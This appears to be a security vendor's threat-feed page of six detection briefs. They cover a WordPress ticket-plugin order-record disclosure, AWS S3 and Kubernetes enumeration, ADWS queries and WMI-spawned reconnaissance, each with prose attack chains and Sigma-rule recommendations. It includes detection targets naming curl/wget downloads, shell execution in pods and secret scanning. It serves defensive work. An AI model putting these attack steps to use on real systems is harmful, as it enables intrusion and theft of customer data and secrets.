Enumeration — CraftedSignal Threat Feed

WordPress Easy PayPal Events & Tickets Plugin Information Disclosure Vulnerability

hello@craftedsignal.io — Mon, 04 May 2026 18:16:29 +0000

The Easy PayPal Events & Tickets plugin for WordPress, versions 1.3 and earlier, contains an information disclosure vulnerability (CVE-2026-41471). This vulnerability allows unauthenticated attackers to iterate through WordPress post IDs via the scan_qr.php endpoint. By sequentially accessing these IDs, attackers can retrieve customer order records stored within the WordPress database. The plugin was officially closed as of March 18, 2026, meaning websites using the plugin prior to this date are vulnerable. This allows for the potential harvesting of sensitive customer data including names, addresses, and purchase histories.

Attack Chain

An unauthenticated attacker identifies a WordPress site using the vulnerable Easy PayPal Events & Tickets plugin (version 1.3 or earlier).
The attacker crafts a malicious HTTP request targeting the scan_qr.php endpoint.
The attacker modifies the request to iterate through sequential WordPress post IDs.
The server processes the request without proper authentication or authorization checks.
The scan_qr.php endpoint queries the WordPress database for order records associated with the provided post ID.
If a valid order record is found, the server returns the information in the HTTP response.
The attacker parses the HTTP response to extract customer order information.
The attacker repeats steps 2-7, incrementing the post ID to enumerate all order records.

Impact

Successful exploitation of this vulnerability allows unauthenticated attackers to retrieve all customer order records stored in the WordPress database. This can lead to the disclosure of sensitive customer information, including names, email addresses, purchase history, and potentially other personal details. The number of affected victims depends on the popularity and usage of the vulnerable plugin. If the database contains financial information the impact could be severe.

Recommendation

Deploy the Sigma rule detecting requests to the scan_qr.php endpoint with iterative post IDs to identify potential exploitation attempts.
If still using the Easy PayPal Events & Tickets plugin, remove the plugin, as it was closed as of 2026-03-18.
Monitor web server logs for suspicious activity targeting the scan_qr.php endpoint.
Review the WordPress access logs for requests originating from unusual IP addresses accessing the scan_qr.php endpoint.

Rapid Enumeration of AWS S3 Buckets

hello@craftedsignal.io — Fri, 01 May 2026 19:43:38 +0000

This threat brief covers suspicious activity related to the rapid enumeration of AWS S3 buckets. The activity is characterized by an AWS principal invoking read-only S3 control-plane APIs from the same source IP address within a short timeframe. This pattern is often associated with reconnaissance efforts, security scanning tools, or post-compromise enumeration activities. The behavior is similar to that observed with CSPM tools and by threat actors like Team PCP. The detection specifically excludes AWS service principals and requires programmatic-style sessions (i.e., not Management Console credentials). It focuses on scenarios where resource and identity fields are populated to avoid skewed results from null values. The detection threshold is set to greater than 15 distinct aws.cloudtrail.resources.arn values within a 10-second window.

Attack Chain

An attacker gains initial access to an AWS environment using compromised credentials or through an exposed IAM role. (T1530)
The attacker authenticates to AWS using the obtained credentials, creating a programmatic session.
The attacker issues a series of GetBucketAcl, GetBucketPublicAccessBlock, GetBucketPolicy, GetBucketPolicyStatus, and GetBucketVersioning API calls to S3.
These API calls are directed towards multiple distinct S3 buckets within a short timeframe (10 seconds).
The attacker collects information about the bucket’s access control lists (ACLs), public access blocks, policies, versioning status, and other metadata. (T1526, T1580, T1619)
The collected information is analyzed to identify publicly accessible buckets, misconfigurations, or sensitive data storage locations.
The attacker uses identified vulnerabilities to exfiltrate data.
The attacker attempts lateral movement within the AWS environment, leveraging the discovered information to compromise other resources.

Impact

Successful enumeration of S3 buckets can lead to the discovery of sensitive data, misconfigurations, and publicly accessible resources. This can result in data breaches, unauthorized access, and further compromise of the AWS environment. The enumeration allows an attacker to map out the S3 storage landscape, identifying targets for data exfiltration or privilege escalation. The rapid nature of the enumeration suggests automated scanning or reconnaissance, potentially indicating a larger attack campaign.

Recommendation

Deploy the following Sigma rule to detect rapid S3 bucket enumeration activity based on AWS CloudTrail logs, adjusting the threshold of 15 distinct buckets to suit your environment.
Investigate any alerts generated by the Sigma rule, focusing on the source IP address (source.ip), AWS principal ARN (aws.cloudtrail.user_identity.arn), and the list of accessed buckets (aws.cloudtrail.resources.arn).
Review IAM policies associated with the identified principal to ensure least privilege for S3 read APIs.
Monitor CloudTrail logs for related events, such as ListBuckets, GetObject, PutBucketPolicy, AssumeRole, or IAM changes, occurring within ±30 minutes of the detected enumeration activity.
Implement network-level restrictions on the source IP address if it is not authorized to perform S3 enumeration.
Document approved scanning accounts and add user agent filters to the provided Sigma rule to reduce noise from those identities.

Kubernetes Endpoint Permission Enumeration

hello@craftedsignal.io — Thu, 05 Mar 2026 13:13:30 +0000

This detection identifies potential endpoint enumeration attempts within a Kubernetes environment. An attacker, or a compromised account, may attempt to map accessible resources within the Kubernetes cluster by issuing a burst of API calls across multiple endpoints from a single user and source IP address. This is achieved through a combination of both successful and failed API requests. The behavior is not typical of normal Kubernetes cluster operation. Attackers leverage this reconnaissance to identify high-value targets like secrets, pods, or nodes before attempting privilege escalation or lateral movement. The rule specifically looks for unusual patterns in Kubernetes audit logs.

Attack Chain

The attacker gains initial access to the Kubernetes cluster, potentially through compromised credentials or a vulnerable application.
The attacker uses kubectl or a similar tool to send a series of API requests.
The attacker attempts to enumerate Kubernetes API endpoints using “get”, “list”, “watch”, “create”, “update”, and “patch” verbs.
The requests target a variety of resources, including pods, services, deployments, secrets, and nodes.
The attacker analyzes the responses to identify endpoints and resources that are accessible with the current credentials. Successful and failed responses are both valuable for mapping permissions.
The attacker identifies valuable targets, such as secrets or sensitive data stored in configmaps.
The attacker attempts to escalate privileges by exploiting identified vulnerabilities or misconfigurations.
The attacker moves laterally within the cluster to gain access to other resources or workloads.

Impact

Successful enumeration can lead to privilege escalation, lateral movement, and data exfiltration within the Kubernetes cluster. Attackers can identify and compromise sensitive resources such as secrets, configmaps, and pods. The number of affected systems and the scope of the impact depend on the extent of the attacker’s access and the sensitivity of the compromised resources.

Recommendation

Enable Kubernetes audit logging to capture API server requests and responses, which is required for the provided rules and the original Elastic rule.
Deploy the Sigma rules provided below to your SIEM to detect enumeration attempts and tune them based on your environment.
Enforce the principle of least privilege by assigning appropriate RBAC roles to users and service accounts to limit potential enumeration damage.
Monitor Kubernetes audit logs for unusual API request patterns, specifically a high number of requests from a single user and IP address.
Review RBAC bindings for unexpected or overly broad access as mentioned in the overview.
Segment API access with network controls (private endpoint/VPN allowlists) as suggested in the response section of the overview.

Potential Enumeration via Active Directory Web Service

hello@craftedsignal.io — Wed, 31 Jan 2024 00:00:00 +0000

The Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) over a network, providing a web-based interface for directory services. Adversaries may exploit ADWS to enumerate network resources and user accounts, gaining insights into the environment. This attack involves loading Active Directory related modules and establishing network connections to the ADWS dedicated TCP port 9389. The goal is to gather information about the domain, user accounts, and permissions, which can be used for lateral movement, privilege escalation, and data exfiltration. Detection focuses on identifying suspicious processes loading System.DirectoryServices*.dll or System.IdentityModel*.dll and then connecting to the ADWS port.

Attack Chain

An attacker gains initial access to a compromised host within the target network.
The attacker executes a reconnaissance tool or script (e.g., PowerShell) on the compromised host.
The reconnaissance tool loads Active Directory related modules such as System.DirectoryServices*.dll and System.IdentityModel*.dll.
The reconnaissance tool attempts to establish a network connection to the ADWS service on TCP port 9389, the dedicated port for ADWS.
The tool queries ADWS to retrieve information about domain users (T1087.002), groups (T1069.002), systems (T1018), and permissions.
The attacker analyzes the gathered information to identify privileged accounts and potential targets for lateral movement.
The attacker uses the discovered information to move laterally within the network.
The attacker escalates privileges, and exfiltrates sensitive data.

Impact

Successful exploitation allows attackers to gain detailed knowledge of the Active Directory environment. This information can be used to identify high-value targets, compromise privileged accounts, move laterally within the network, and ultimately achieve their objectives, which could include data theft, ransomware deployment, or disruption of services. The impact can range from data breaches to complete compromise of the Active Directory domain, depending on the attacker’s goals and the level of access they achieve.

Recommendation

Deploy the Sigma rule “Potential ADWS Enumeration via Suspicious Library Loading” to detect processes loading AD-related DLLs (e.g., System.DirectoryServices*.dll, System.IdentityModel*.dll).
Deploy the Sigma rule “Potential ADWS Enumeration via Network Connection” to monitor for network connections to destination port 9389 from unusual processes.
Review and whitelist legitimate administrative tools or scripts that load Active Directory-related modules and connect to the ADWS port as described in the “False positive analysis” section of the original rule documentation.
Implement network segmentation to limit access to the ADWS port (9389) to only trusted systems and users.

Kubernetes Cluster Enumeration via Audit Logs

hello@craftedsignal.io — Mon, 29 Jan 2024 12:00:00 +0000

Attackers are increasingly targeting Kubernetes environments to gain unauthorized access and extract sensitive information. This activity often begins with enumeration and reconnaissance to map out the cluster’s configuration, identify potential vulnerabilities, and locate valuable secrets. This involves the use of standard command-line tools and specialized Kubernetes utilities. Audit logs provide a valuable record of these enumeration attempts, particularly API requests containing shell commands, file transfer utilities, or tools like Rakkess and TruffleHog. This activity is typically aimed at reconnaissance, secret harvesting, or code execution within the cluster. Detecting these patterns in audit logs is critical for identifying and responding to potential breaches.

Attack Chain

Attacker gains initial access to a system with Kubernetes API access, potentially through compromised credentials or a vulnerable application.
The attacker authenticates to the Kubernetes API server.
The attacker sends a request to the Kubernetes API to execute a shell within a pod, such as /bin/bash or /bin/sh, potentially URL-encoded.
The attacker uses kubectl within a pod to gather information about cluster resources, such as pods, services, and deployments.
The attacker attempts to download tools like curl or wget into a pod to facilitate further reconnaissance or lateral movement.
The attacker uses tools like Rakkess to enumerate role-based access control (RBAC) permissions to identify potential privilege escalation paths.
The attacker deploys TruffleHog to scan pod environments for exposed secrets, such as API keys and passwords.
The attacker exfiltrates gathered information and secrets or uses the gained access for lateral movement within the cluster or connected networks.

Impact

Successful enumeration of a Kubernetes cluster can provide attackers with detailed information about the cluster’s architecture, deployed applications, and security configurations. This allows attackers to identify vulnerabilities, escalate privileges, and gain access to sensitive data, such as API keys, passwords, and other secrets. This can lead to data breaches, service disruptions, and compromised infrastructure. The impact can range from a limited data exposure to a full-scale compromise of the entire Kubernetes environment and connected cloud resources.

Recommendation

Deploy the “Kubernetes Potential Enumeration Activity” Sigma rule to your SIEM to detect suspicious API requests containing shell commands, file transfer utilities, or specialized tools (Sigma rule).
Investigate any alerts triggered by the Sigma rule to determine the scope and impact of the potential enumeration activity.
Review and harden RBAC configurations to minimize the potential for privilege escalation (attack.t1609).
Implement strict network segmentation to limit lateral movement within the cluster and connected networks.
Regularly scan pods for exposed secrets using dedicated secret scanning tools and enforce secure secret management practices.
Monitor Kubernetes audit logs for unusual or unauthorized API activity (logsource: kubernetes, service: audit).

Suspicious Enumeration Commands Spawned via WMIPrvSE

hello@craftedsignal.io — Wed, 03 Jan 2024 15:00:00 +0000

Attackers can leverage the Windows Management Instrumentation (WMI) to execute commands for reconnaissance and enumeration within a compromised system. This involves spawning native Windows tools via the WMI Provider Service (WMIPrvSE). This activity is often used to gather system and network information in a stealthy manner, which could be part of a larger attack, such as lateral movement or privilege escalation. This behavior matters because it allows adversaries to gather information about the target environment without using easily detectable methods, potentially leading to further compromise.

Attack Chain

The attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).
The attacker uses WMI to execute a reconnaissance command.
WMIPrvSE.exe is invoked to execute the attacker’s specified command.
The attacker executes commands such as ipconfig.exe, net.exe, or systeminfo.exe via WMIPrvSE.exe to gather network configuration details, user information, and system information.
The enumerated information is collected and potentially exfiltrated to a command and control server.
The attacker uses the gathered information to identify further targets within the network.
The attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.
The attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.

Impact

Successful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.

Recommendation

Enable Sysmon process creation logging to capture the execution of enumeration commands (Data Source: Sysmon).
Deploy the Sigma rule “Enumeration Command Spawned via WMIPrvSE” to your SIEM to detect suspicious WMIPrvSE activity (Sigma rule).
Investigate any instances of WMIPrvSE spawning common enumeration tools such as net.exe, ipconfig.exe, or systeminfo.exe (Sigma rule).
Implement network segmentation to limit the scope of potential lateral movement following successful enumeration (Attack Chain).